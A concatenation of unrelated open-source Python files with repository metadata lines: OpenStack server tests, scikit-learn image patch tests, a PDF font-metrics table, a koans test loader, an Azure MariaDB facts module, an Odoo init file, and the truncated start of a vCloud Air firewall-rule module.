]
flavors = [
{'name': 'm1.small', 'id': '1', 'flavor_ram': 1024},
{'name': 'm1.tiny', 'id': '2', 'flavor_ram': 512},
]
def _find(self, source, name):
for item in source:
if item['name'] == name or item['id'] == name:
return item
def get_image_id(self, name, exclude=None):
image = self._find(self.images, name)
if image:
return image['id']
def get_flavor(self, name):
return self._find(self.flavors, name)
def get_flavor_by_ram(self, ram, include=None):
for flavor in self.flavors:
            if flavor['flavor_ram'] >= ram and (include is None or
                                                include in flavor['name']):
return flavor
def get_port(self, name):
return self._find(self.ports, name)
def get_network(self, name):
return self._find(self.networks, name)
create_server = mock.MagicMock()
class TestNetworkArgs(object):
'''This class exercises the _network_args function of the
os_server module. For each test, we parse the YAML document
contained in the docstring to retrieve the module parameters for the
test.'''
def setup_method(self, method):
self.cloud = FakeCloud()
self.module = mock.MagicMock()
self.module.params = params_from_doc(method)
def test_nics_string_net_id(self):
'''
- os_server:
nics: net-id=1234
'''
args = os_server._network_args(self.module, self.cloud)
assert(args[0]['net-id'] == '1234')
def test_nics_string_net_id_list(self):
'''
- os_server:
nics: net-id=1234,net-id=4321
'''
args = os_server._network_args(self.module, self.cloud)
assert(args[0]['net-id'] == '1234')
assert(args[1]['net-id'] == '4321')
def test_nics_string_port_id(self):
'''
- os_server:
nics: port-id=1234
'''
args = os_server._network_args(self.module, self.cloud)
assert(args[0]['port-id'] == '1234')
def test_nics_string_net_name(self):
'''
- os_server:
nics: net-name=network1
'''
args = os_server._network_args(self.module, self.cloud)
assert(args[0]['net-id'] == '5678')
def test_nics_string_port_name(self):
'''
- os_server:
nics: port-name=port1
'''
args = os_server._network_args(self.module, self.cloud)
assert(args[0]['port-id'] == '1234')
def test_nics_structured_net_id(self):
'''
- os_server:
nics:
- net-id: '1234'
'''
args = os_server._network_args(self.module, self.cloud)
assert(args[0]['net-id'] == '1234')
def test_nics_structured_mixed(self):
'''
- os_server:
nics:
- net-id: '1234'
- port-name: port1
- 'net-name=network1,port-id=4321'
'''
args = os_server._network_args(self.module, self.cloud)
assert(args[0]['net-id'] == '1234')
assert(args[1]['port-id'] == '1234')
assert(args[2]['net-id'] == '5678')
assert(args[3]['port-id'] == '4321')
class TestCreateServer(object):
def setup_method(self, method):
self.cloud = FakeCloud()
self.module = mock.MagicMock()
self.module.params = params_from_doc(method)
self.module.fail_json.side_effect = AnsibleFail()
self.module.exit_json.side_effect = AnsibleExit()
self.meta = mock.MagicMock()
        self.meta.get_hostvars_from_server.return_value = {
'id': '1234'
}
os_server.meta = self.meta
def test_create_server(self):
'''
- os_server:
image: cirros
flavor: m1.tiny
nics:
- net-name: network1
meta:
- key: value
'''
with pytest.raises(AnsibleExit):
os_server._create_server(self.module, self.cloud)
assert(self.cloud.create_server.call_count == 1)
assert(self.cloud.create_server.call_args[1]['image']
== self.cloud.get_image_id('cirros'))
assert(self.cloud.create_server.call_args[1]['flavor']
== self.cloud.get_flavor('m1.tiny')['id'])
assert(self.cloud.create_server.call_args[1]['nics'][0]['net-id']
== self.cloud.get_network('network1')['id'])
def test_create_server_bad_flavor(self):
'''
- os_server:
image: cirros
flavor: missing_flavor
nics:
- net-name: network1
'''
with pytest.raises(AnsibleFail):
os_server._create_server(self.module, self.cloud)
assert('missing_flavor' in
self.module.fail_json.call_args[1]['msg'])
def test_create_server_bad_nic(self):
'''
- os_server:
image: cirros
flavor: m1.tiny
nics:
- net-name: missing_network
'''
with pytest.raises(AnsibleFail):
os_server._create_server(self.module, self.cloud)
assert('missing_network' in
self.module.fail_json.call_args[1]['msg'])
| britcey/ansible | test/units/modules/cloud/openstack/test_os_server.py | Python | gpl-3.0 | 6,519 |
# Authors: Emmanuelle Gouillart <[email protected]>
# Gael Varoquaux <[email protected]>
# License: BSD 3 clause
import numpy as np
import scipy as sp
from scipy import ndimage
from nose.tools import assert_equal, assert_true
from numpy.testing import assert_raises
from sklearn.feature_extraction.image import (
img_to_graph, grid_to_graph, extract_patches_2d,
reconstruct_from_patches_2d, PatchExtractor, extract_patches)
from sklearn.utils.graph import connected_components
from sklearn.utils.testing import SkipTest
from sklearn.utils.fixes import sp_version
if sp_version < (0, 12):
raise SkipTest("Skipping because SciPy version earlier than 0.12.0 and "
"thus does not include the scipy.misc.face() image.")
def test_img_to_graph():
x, y = np.mgrid[:4, :4] - 10
grad_x = img_to_graph(x)
grad_y = img_to_graph(y)
assert_equal(grad_x.nnz, grad_y.nnz)
# Negative elements are the diagonal: the elements of the original
# image. Positive elements are the values of the gradient, they
# should all be equal on grad_x and grad_y
np.testing.assert_array_equal(grad_x.data[grad_x.data > 0],
grad_y.data[grad_y.data > 0])
def test_grid_to_graph():
# Checking that the function works with graphs containing no edges
size = 2
roi_size = 1
# Generating two convex parts with one vertex
# Thus, edges will be empty in _to_graph
mask = np.zeros((size, size), dtype=np.bool)
mask[0:roi_size, 0:roi_size] = True
mask[-roi_size:, -roi_size:] = True
mask = mask.reshape(size ** 2)
A = grid_to_graph(n_x=size, n_y=size, mask=mask, return_as=np.ndarray)
assert_true(connected_components(A)[0] == 2)
# Checking that the function works whatever the type of mask is
mask = np.ones((size, size), dtype=np.int16)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask)
assert_true(connected_components(A)[0] == 1)
# Checking dtype of the graph
mask = np.ones((size, size))
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.bool)
assert_true(A.dtype == np.bool)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.int)
assert_true(A.dtype == np.int)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask,
dtype=np.float64)
assert_true(A.dtype == np.float64)
def test_connect_regions():
try:
face = sp.face(gray=True)
except AttributeError:
# Newer versions of scipy have face in misc
from scipy import misc
face = misc.face(gray=True)
for thr in (50, 150):
mask = face > thr
graph = img_to_graph(face, mask)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
def test_connect_regions_with_grid():
try:
face = sp.face(gray=True)
except AttributeError:
# Newer versions of scipy have face in misc
from scipy import misc
face = misc.face(gray=True)
mask = face > 50
graph = grid_to_graph(*face.shape, mask=mask)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
mask = face > 150
graph = grid_to_graph(*face.shape, mask=mask, dtype=None)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
def _downsampled_face():
try:
face = sp.face(gray=True)
except AttributeError:
# Newer versions of scipy have face in misc
from scipy import misc
face = misc.face(gray=True)
face = face.astype(np.float32)
face = (face[::2, ::2] + face[1::2, ::2] + face[::2, 1::2]
+ face[1::2, 1::2])
face = (face[::2, ::2] + face[1::2, ::2] + face[::2, 1::2]
+ face[1::2, 1::2])
face = face.astype(np.float32)
face /= 16.0
return face
def _orange_face(face=None):
face = _downsampled_face() if face is None else face
face_color = np.zeros(face.shape + (3,))
face_color[:, :, 0] = 256 - face
face_color[:, :, 1] = 256 - face / 2
face_color[:, :, 2] = 256 - face / 4
return face_color
def _make_images(face=None):
face = _downsampled_face() if face is None else face
# make a collection of faces
images = np.zeros((3,) + face.shape)
images[0] = face
images[1] = face + 1
images[2] = face + 2
return images
downsampled_face = _downsampled_face()
orange_face = _orange_face(downsampled_face)
face_collection = _make_images(downsampled_face)
def test_extract_patches_all():
face = downsampled_face
i_h, i_w = face.shape
p_h, p_w = 16, 16
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(face, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
def test_extract_patches_all_color():
face = orange_face
i_h, i_w = face.shape[:2]
p_h, p_w = 16, 16
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(face, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w, 3))
def test_extract_patches_all_rect():
face = downsampled_face
face = face[:, 32:97]
i_h, i_w = face.shape
p_h, p_w = 16, 12
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(face, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
def test_extract_patches_max_patches():
face = downsampled_face
i_h, i_w = face.shape
p_h, p_w = 16, 16
patches = extract_patches_2d(face, (p_h, p_w), max_patches=100)
assert_equal(patches.shape, (100, p_h, p_w))
expected_n_patches = int(0.5 * (i_h - p_h + 1) * (i_w - p_w + 1))
patches = extract_patches_2d(face, (p_h, p_w), max_patches=0.5)
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
assert_raises(ValueError, extract_patches_2d, face, (p_h, p_w),
max_patches=2.0)
assert_raises(ValueError, extract_patches_2d, face, (p_h, p_w),
max_patches=-1.0)
def test_reconstruct_patches_perfect():
face = downsampled_face
p_h, p_w = 16, 16
patches = extract_patches_2d(face, (p_h, p_w))
face_reconstructed = reconstruct_from_patches_2d(patches, face.shape)
np.testing.assert_array_almost_equal(face, face_reconstructed)
def test_reconstruct_patches_perfect_color():
face = orange_face
p_h, p_w = 16, 16
patches = extract_patches_2d(face, (p_h, p_w))
face_reconstructed = reconstruct_from_patches_2d(patches, face.shape)
np.testing.assert_array_almost_equal(face, face_reconstructed)
def test_patch_extractor_fit():
faces = face_collection
extr = PatchExtractor(patch_size=(8, 8), max_patches=100, random_state=0)
assert_true(extr == extr.fit(faces))
def test_patch_extractor_max_patches():
faces = face_collection
i_h, i_w = faces.shape[1:3]
p_h, p_w = 8, 8
max_patches = 100
expected_n_patches = len(faces) * max_patches
extr = PatchExtractor(patch_size=(p_h, p_w), max_patches=max_patches,
random_state=0)
patches = extr.transform(faces)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
max_patches = 0.5
expected_n_patches = len(faces) * int((i_h - p_h + 1) * (i_w - p_w + 1)
* max_patches)
extr = PatchExtractor(patch_size=(p_h, p_w), max_patches=max_patches,
random_state=0)
patches = extr.transform(faces)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
def test_patch_extractor_max_patches_default():
faces = face_collection
extr = PatchExtractor(max_patches=100, random_state=0)
patches = extr.transform(faces)
assert_equal(patches.shape, (len(faces) * 100, 19, 25))
def test_patch_extractor_all_patches():
faces = face_collection
i_h, i_w = faces.shape[1:3]
p_h, p_w = 8, 8
expected_n_patches = len(faces) * (i_h - p_h + 1) * (i_w - p_w + 1)
extr = PatchExtractor(patch_size=(p_h, p_w), random_state=0)
patches = extr.transform(faces)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
def test_patch_extractor_color():
faces = _make_images(orange_face)
i_h, i_w = faces.shape[1:3]
p_h, p_w = 8, 8
expected_n_patches = len(faces) * (i_h - p_h + 1) * (i_w - p_w + 1)
extr = PatchExtractor(patch_size=(p_h, p_w), random_state=0)
patches = extr.transform(faces)
assert_true(patches.shape == (expected_n_patches, p_h, p_w, 3))
def test_extract_patches_strided():
image_shapes_1D = [(10,), (10,), (11,), (10,)]
patch_sizes_1D = [(1,), (2,), (3,), (8,)]
patch_steps_1D = [(1,), (1,), (4,), (2,)]
expected_views_1D = [(10,), (9,), (3,), (2,)]
last_patch_1D = [(10,), (8,), (8,), (2,)]
image_shapes_2D = [(10, 20), (10, 20), (10, 20), (11, 20)]
patch_sizes_2D = [(2, 2), (10, 10), (10, 11), (6, 6)]
patch_steps_2D = [(5, 5), (3, 10), (3, 4), (4, 2)]
expected_views_2D = [(2, 4), (1, 2), (1, 3), (2, 8)]
last_patch_2D = [(5, 15), (0, 10), (0, 8), (4, 14)]
image_shapes_3D = [(5, 4, 3), (3, 3, 3), (7, 8, 9), (7, 8, 9)]
patch_sizes_3D = [(2, 2, 3), (2, 2, 2), (1, 7, 3), (1, 3, 3)]
patch_steps_3D = [(1, 2, 10), (1, 1, 1), (2, 1, 3), (3, 3, 4)]
expected_views_3D = [(4, 2, 1), (2, 2, 2), (4, 2, 3), (3, 2, 2)]
last_patch_3D = [(3, 2, 0), (1, 1, 1), (6, 1, 6), (6, 3, 4)]
image_shapes = image_shapes_1D + image_shapes_2D + image_shapes_3D
patch_sizes = patch_sizes_1D + patch_sizes_2D + patch_sizes_3D
patch_steps = patch_steps_1D + patch_steps_2D + patch_steps_3D
expected_views = expected_views_1D + expected_views_2D + expected_views_3D
last_patches = last_patch_1D + last_patch_2D + last_patch_3D
for (image_shape, patch_size, patch_step, expected_view,
last_patch) in zip(image_shapes, patch_sizes, patch_steps,
expected_views, last_patches):
image = np.arange(np.prod(image_shape)).reshape(image_shape)
patches = extract_patches(image, patch_shape=patch_size,
extraction_step=patch_step)
ndim = len(image_shape)
assert_true(patches.shape[:ndim] == expected_view)
last_patch_slices = [slice(i, i + j, None) for i, j in
zip(last_patch, patch_size)]
assert_true((patches[[slice(-1, None, None)] * ndim] ==
image[last_patch_slices].squeeze()).all())
def test_extract_patches_square():
# test same patch size for all dimensions
face = downsampled_face
i_h, i_w = face.shape
p = 8
expected_n_patches = ((i_h - p + 1), (i_w - p + 1))
patches = extract_patches(face, patch_shape=p)
assert_true(patches.shape == (expected_n_patches[0], expected_n_patches[1],
p, p))
def test_width_patch():
# width and height of the patch should be less than the image
x = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
assert_raises(ValueError, extract_patches_2d, x, (4, 1))
assert_raises(ValueError, extract_patches_2d, x, (1, 4))
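def test_patch_roundtrip_demo():
    # A small worked example added for illustration (not an upstream test):
    # all 2x2 patches of a 4x4 image reconstruct the image exactly with the
    # public API exercised above.
    image = np.arange(16, dtype=np.float64).reshape(4, 4)
    patches = extract_patches_2d(image, (2, 2))
    assert_equal(patches.shape, (9, 2, 2))  # (4-2+1) * (4-2+1) patches
    rebuilt = reconstruct_from_patches_2d(patches, image.shape)
    np.testing.assert_array_almost_equal(image, rebuilt)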
| toastedcornflakes/scikit-learn | sklearn/feature_extraction/tests/test_image.py | Python | bsd-3-clause | 11,187 |
type='TrueType'
name='Calligrapher-Regular'
desc={'Ascent':899,'Descent':-234,'CapHeight':731,'Flags':32,'FontBBox':'[-50 -234 1328 899]','ItalicAngle':0,'StemV':70,'MissingWidth':800}
up=-200
ut=20
cw={
'\x00':800,'\x01':800,'\x02':800,'\x03':800,'\x04':800,'\x05':800,'\x06':800,'\x07':800,'\x08':800,'\t':800,'\n':800,'\x0b':800,'\x0c':800,'\r':800,'\x0e':800,'\x0f':800,'\x10':800,'\x11':800,'\x12':800,'\x13':800,'\x14':800,'\x15':800,
'\x16':800,'\x17':800,'\x18':800,'\x19':800,'\x1a':800,'\x1b':800,'\x1c':800,'\x1d':800,'\x1e':800,'\x1f':800,' ':282,'!':324,'"':405,'#':584,'$':632,'%':980,'&':776,'\'':259,'(':299,')':299,'*':377,'+':600,
',':259,'-':432,'.':254,'/':597,'0':529,'1':298,'2':451,'3':359,'4':525,'5':423,'6':464,'7':417,'8':457,'9':479,':':275,';':282,'<':600,'=':600,'>':600,'?':501,'@':800,'A':743,
'B':636,'C':598,'D':712,'E':608,'F':562,'G':680,'H':756,'I':308,'J':314,'K':676,'L':552,'M':1041,'N':817,'O':729,'P':569,'Q':698,'R':674,'S':618,'T':673,'U':805,'V':753,'W':1238,
'X':716,'Y':754,'Z':599,'[':315,'\\':463,']':315,'^':600,'_':547,'`':278,'a':581,'b':564,'c':440,'d':571,'e':450,'f':347,'g':628,'h':611,'i':283,'j':283,'k':560,'l':252,'m':976,
'n':595,'o':508,'p':549,'q':540,'r':395,'s':441,'t':307,'u':614,'v':556,'w':915,'x':559,'y':597,'z':452,'{':315,'|':222,'}':315,'~':600,'\x7f':800,'\x80':800,'\x81':800,'\x82':0,'\x83':0,
'\x84':0,'\x85':780,'\x86':0,'\x87':0,'\x88':278,'\x89':0,'\x8a':0,'\x8b':0,'\x8c':1064,'\x8d':800,'\x8e':800,'\x8f':800,'\x90':800,'\x91':259,'\x92':259,'\x93':470,'\x94':470,'\x95':500,'\x96':300,'\x97':600,'\x98':278,'\x99':990,
'\x9a':0,'\x9b':0,'\x9c':790,'\x9d':800,'\x9e':800,'\x9f':754,'\xa0':282,'\xa1':324,'\xa2':450,'\xa3':640,'\xa4':518,'\xa5':603,'\xa6':0,'\xa7':519,'\xa8':254,'\xa9':800,'\xaa':349,'\xab':0,'\xac':0,'\xad':432,'\xae':800,'\xaf':278,
'\xb0':0,'\xb1':0,'\xb2':0,'\xb3':0,'\xb4':278,'\xb5':614,'\xb6':0,'\xb7':254,'\xb8':278,'\xb9':0,'\xba':305,'\xbb':0,'\xbc':0,'\xbd':0,'\xbe':0,'\xbf':501,'\xc0':743,'\xc1':743,'\xc2':743,'\xc3':743,'\xc4':743,'\xc5':743,
'\xc6':1060,'\xc7':598,'\xc8':608,'\xc9':608,'\xca':608,'\xcb':608,'\xcc':308,'\xcd':308,'\xce':308,'\xcf':308,'\xd0':0,'\xd1':817,'\xd2':729,'\xd3':729,'\xd4':729,'\xd5':729,'\xd6':729,'\xd7':0,'\xd8':729,'\xd9':805,'\xda':805,'\xdb':805,
'\xdc':805,'\xdd':0,'\xde':0,'\xdf':688,'\xe0':581,'\xe1':581,'\xe2':581,'\xe3':581,'\xe4':581,'\xe5':581,'\xe6':792,'\xe7':440,'\xe8':450,'\xe9':450,'\xea':450,'\xeb':450,'\xec':283,'\xed':283,'\xee':283,'\xef':283,'\xf0':800,'\xf1':595,
'\xf2':508,'\xf3':508,'\xf4':508,'\xf5':508,'\xf6':508,'\xf7':0,'\xf8':508,'\xf9':614,'\xfa':614,'\xfb':614,'\xfc':614,'\xfd':0,'\xfe':0,'\xff':597}
enc='cp1252'
diff=''
filename='calligra.z'
originalsize=40120
| sesuncedu/bitcurator | tools/py3fpdf/attic/font/calligra.py | Python | gpl-3.0 | 2,763 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Functions to load the test cases ("koans") that make up the
Path to Enlightenment.
'''
import io
import unittest
# The path to enlightenment starts with the following:
KOANS_FILENAME = 'koans.txt'
def filter_koan_names(lines):
'''
Strips leading and trailing whitespace, then filters out blank
lines and comment lines.
'''
for line in lines:
line = line.strip()
if line.startswith('#'):
continue
if line:
yield line
return
def names_from_file(filename):
'''
Opens the given ``filename`` and yields the fully-qualified names
of TestCases found inside (one per line).
'''
with io.open(filename, 'rt', encoding='utf8') as names_file:
for name in filter_koan_names(names_file):
yield name
return
def koans_suite(names):
'''
Returns a ``TestSuite`` loaded with all tests found in the given
``names``, preserving the order in which they are found.
'''
suite = unittest.TestSuite()
loader = unittest.TestLoader()
loader.sortTestMethodsUsing = None
for name in names:
tests = loader.loadTestsFromName(name)
suite.addTests(tests)
return suite
def koans(filename=KOANS_FILENAME):
'''
Returns a ``TestSuite`` loaded with all the koans (``TestCase``s)
listed in ``filename``.
'''
names = names_from_file(filename)
return koans_suite(names)
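# A usage sketch added for illustration (not part of the original module):
# run the suite assembled above with the stock unittest runner. It assumes a
# koans.txt alongside this file, one fully-qualified TestCase name per line.
if __name__ == '__main__':
    import sys
    result = unittest.TextTestRunner(verbosity=2).run(koans())
    sys.exit(0 if result.wasSuccessful() else 1)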
| haroldtreen/python_koans | runner/path_to_enlightenment.py | Python | mit | 1,482 |
#!/usr/bin/python
#
# Copyright (c) 2017 Zim Kalinowski, <[email protected]>
# Copyright (c) 2019 Matti Ranta, (@techknowlogick)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_mariadbdatabase_info
version_added: "2.9"
short_description: Get Azure MariaDB Database facts
description:
- Get facts of MariaDB Database.
options:
resource_group:
description:
- The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
required: True
type: str
server_name:
description:
- The name of the server.
required: True
type: str
name:
description:
- The name of the database.
type: str
extends_documentation_fragment:
- azure
author:
- Zim Kalinowski (@zikalino)
- Matti Ranta (@techknowlogick)
'''
EXAMPLES = '''
- name: Get instance of MariaDB Database
azure_rm_mariadbdatabase_info:
resource_group: myResourceGroup
server_name: server_name
name: database_name
- name: List instances of MariaDB Database
azure_rm_mariadbdatabase_info:
resource_group: myResourceGroup
server_name: server_name
'''
RETURN = '''
databases:
description:
- A list of dictionaries containing facts for MariaDB Databases.
returned: always
type: complex
contains:
id:
description:
- Resource ID.
returned: always
type: str
sample: "/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/myResourceGroup/providers/Microsoft.DBforMariaDB/servers/testser
ver/databases/db1"
resource_group:
description:
- Resource group name.
returned: always
type: str
sample: testrg
server_name:
description:
- Server name.
returned: always
type: str
sample: testserver
name:
description:
- Resource name.
returned: always
type: str
sample: db1
charset:
description:
- The charset of the database.
returned: always
type: str
sample: UTF8
collation:
description:
- The collation of the database.
returned: always
type: str
sample: English_United States.1252
'''
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
try:
from msrestazure.azure_exceptions import CloudError
from azure.mgmt.rdbms.mariadb import MariaDBManagementClient
from msrest.serialization import Model
except ImportError:
# This is handled in azure_rm_common
pass
class AzureRMMariaDbDatabaseInfo(AzureRMModuleBase):
def __init__(self):
# define user inputs into argument
self.module_arg_spec = dict(
resource_group=dict(
type='str',
required=True
),
server_name=dict(
type='str',
required=True
),
name=dict(
type='str'
)
)
# store the results of the module operation
self.results = dict(
changed=False
)
self.resource_group = None
self.server_name = None
self.name = None
super(AzureRMMariaDbDatabaseInfo, self).__init__(self.module_arg_spec, supports_tags=False)
def exec_module(self, **kwargs):
is_old_facts = self.module._name == 'azure_rm_mariadbdatabase_facts'
if is_old_facts:
self.module.deprecate("The 'azure_rm_mariadbdatabase_facts' module has been renamed to 'azure_rm_mariadbdatabase_info'", version='2.13')
for key in self.module_arg_spec:
setattr(self, key, kwargs[key])
if (self.resource_group is not None and
self.server_name is not None and
self.name is not None):
self.results['databases'] = self.get()
elif (self.resource_group is not None and
self.server_name is not None):
self.results['databases'] = self.list_by_server()
return self.results
def get(self):
response = None
results = []
try:
response = self.mariadb_client.databases.get(resource_group_name=self.resource_group,
server_name=self.server_name,
database_name=self.name)
self.log("Response : {0}".format(response))
except CloudError as e:
self.log('Could not get facts for Databases.')
if response is not None:
results.append(self.format_item(response))
return results
def list_by_server(self):
response = None
results = []
try:
response = self.mariadb_client.databases.list_by_server(resource_group_name=self.resource_group,
server_name=self.server_name)
self.log("Response : {0}".format(response))
except CloudError as e:
self.fail("Error listing for server {0} - {1}".format(self.server_name, str(e)))
if response is not None:
for item in response:
results.append(self.format_item(item))
return results
def format_item(self, item):
d = item.as_dict()
d = {
'resource_group': self.resource_group,
'server_name': self.server_name,
'name': d['name'],
'charset': d['charset'],
'collation': d['collation']
}
return d
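# Illustrative shape of one entry in the returned 'databases' list (sample
# values only): {'resource_group': 'myResourceGroup', 'server_name':
# 'testserver', 'name': 'db1', 'charset': 'UTF8',
# 'collation': 'utf8_general_ci'}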
def main():
AzureRMMariaDbDatabaseInfo()
if __name__ == '__main__':
main()
| ilpianista/ansible | test/support/integration/plugins/modules/azure_rm_mariadbdatabase_info.py | Python | gpl-3.0 | 6,304 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# Daniel Campos ([email protected]) Date: 07/10/2014
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
from . import models
from . import wizard
| InakiZabala/odoomrp-wip | product_pricelist_import/__init__.py | Python | agpl-3.0 | 966 |
#!/usr/bin/python
# Copyright (c) 2015 VMware, Inc. All Rights Reserved.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: vca_fw
short_description: add or remove firewall rules in a gateway in a vca
description:
- Adds or removes firewall rules from a gateway in a vca environment
version_added: "2.0"
options:
username:
description:
- The vca username or email address, if not set the environment variable VCA_USER is checked for the username.
required: false
default: None
password:
description:
- The vca password, if not set the environment variable VCA_PASS is checked for the password
required: false
default: None
org:
description:
- The org to login to for creating vapp, mostly set when the service_type is vdc.
required: false
default: None
service_id:
description:
- The service id in a vchs environment to be used for creating the vapp
required: false
default: None
host:
description:
- The authentication host to be used when service type is vcd.
required: false
default: None
api_version:
description:
- The api version to be used with the vca
required: false
default: "5.7"
service_type:
description:
- The type of service we are authenticating against
required: false
default: vca
choices: [ "vca", "vchs", "vcd" ]
state:
description:
- if the object should be added or removed
required: false
default: present
choices: [ "present", "absent" ]
verify_certs:
description:
- If the certificates of the authentication is to be verified
required: false
default: True
vdc_name:
description:
- The name of the vdc where the gateway is located.
required: false
default: None
gateway_name:
description:
- The name of the gateway of the vdc where the rule should be added
required: false
default: gateway
fw_rules:
description:
- A list of firewall rules to be added to the gateway, Please see examples on valid entries
required: True
default: false
'''
EXAMPLES = '''
#Add a set of firewall rules
- hosts: localhost
connection: local
tasks:
- vca_fw:
instance_id: 'b15ff1e5-1024-4f55-889f-ea0209726282'
vdc_name: 'benz_ansible'
state: 'absent'
fw_rules:
- description: "ben testing"
source_ip: "Any"
dest_ip: 192.168.2.11
- description: "ben testing 2"
source_ip: 192.168.2.100
source_port: "Any"
dest_port: "22"
dest_ip: 192.168.2.13
is_enable: "true"
enable_logging: "false"
protocol: "Tcp"
policy: "allow"
'''
import os
import time
import json
import xmltodict
HAS_PYVCLOUD = False
try:
from pyvcloud.vcloudair import VCA
from pyvcloud.schema.vcd.v1_5.schemas.vcloud.networkType import ProtocolsType
HAS_PYVCLOUD = True
except ImportError:
pass
SERVICE_MAP = {'vca': 'ondemand', 'vchs': 'subscription', 'vcd': 'vcd'}
LOGIN_HOST = {'vca': 'vca.vmware.com', 'vchs': 'vchs.vmware.com'}
VALID_RULE_KEYS = ['policy', 'is_enable', 'enable_logging', 'description', 'dest_ip', 'dest_port', 'source_ip', 'source_port', 'protocol']
def vca_login(module=None):
service_type = module.params.get('service_type')
username = module.params.get('username')
password = module.params.get('password')
instance = module.params.get('instance_id')
org = module.params.get('org')
service = module.params.get('service_id')
vdc_name = module.params.get('vdc_name')
version = module.params.get('api_version')
verify = module.params.get('verify_certs')
if not vdc_name:
if service_type == 'vchs':
vdc_name = module.params.get('service_id')
if not org:
if service_type == 'vchs':
if vdc_name:
org = vdc_name
else:
org = service
if service_type == 'vcd':
host = module.params.get('host')
else:
host = LOGIN_HOST[service_type]
if not username:
if 'VCA_USER' in os.environ:
username = os.environ['VCA_USER']
if not password:
if 'VCA_PASS' in os.environ:
password = os.environ['VCA_PASS']
if not username or not password:
module.fail_json(msg = "Either the username or password is not set, please check")
if service_type == 'vchs':
version = '5.6'
if service_type == 'vcd':
if not version:
            version = '5.6'
vca = VCA(host=host, username=username, service_type=SERVICE_MAP[service_type], version=version, verify=verify)
if service_type == 'vca':
if not vca.login(password=password):
module.fail_json(msg = "Login Failed: Please check username or password", error=vca.response.content)
if not vca.login_to_instance(password=password, instance=instance, token=None, org_url=None):
s_json = serialize_instances(vca.instances)
module.fail_json(msg = "Login to Instance failed: Seems like instance_id provided is wrong .. Please check",\
valid_instances=s_json)
if not vca.login_to_instance(instance=instance, password=None, token=vca.vcloud_session.token,
org_url=vca.vcloud_session.org_url):
module.fail_json(msg = "Error logging into org for the instance", error=vca.response.content)
return vca
if service_type == 'vchs':
if not vca.login(password=password):
module.fail_json(msg = "Login Failed: Please check username or password", error=vca.response.content)
if not vca.login(token=vca.token):
module.fail_json(msg = "Failed to get the token", error=vca.response.content)
if not vca.login_to_org(service, org):
module.fail_json(msg = "Failed to login to org, Please check the orgname", error=vca.response.content)
return vca
if service_type == 'vcd':
if not vca.login(password=password, org=org):
module.fail_json(msg = "Login Failed: Please check username or password or host parameters")
if not vca.login(password=password, org=org):
module.fail_json(msg = "Failed to get the token", error=vca.response.content)
if not vca.login(token=vca.token, org=org, org_url=vca.vcloud_session.org_url):
module.fail_json(msg = "Failed to login to org", error=vca.response.content)
return vca
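# Summary of the three login flows above: 'vca' logs in with a password and
# then into a specific instance; 'vchs' exchanges the password for a token and
# logs into the org; 'vcd' authenticates directly against the supplied host.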
def validate_fw_rules(module=None, fw_rules=None):
VALID_PROTO = ['Tcp', 'Udp', 'Icmp', 'Any']
for rule in fw_rules:
if not isinstance(rule, dict):
module.fail_json(msg="Firewall rules must be a list of dictionaries, Please check", valid_keys=VALID_RULE_KEYS)
for k in rule.keys():
if k not in VALID_RULE_KEYS:
module.fail_json(msg="%s is not a valid key in fw rules, Please check above.." %k, valid_keys=VALID_RULE_KEYS)
rule['dest_port'] = rule.get('dest_port', 'Any')
rule['dest_ip'] = rule.get('dest_ip', 'Any')
rule['source_port'] = rule.get('source_port', 'Any')
rule['source_ip'] = rule.get('source_ip', 'Any')
rule['protocol'] = rule.get('protocol', 'Any')
rule['policy'] = rule.get('policy', 'allow')
rule['is_enable'] = rule.get('is_enable', 'true')
rule['enable_logging'] = rule.get('enable_logging', 'false')
rule['description'] = rule.get('description', 'rule added by Ansible')
if not rule['protocol'] in VALID_PROTO:
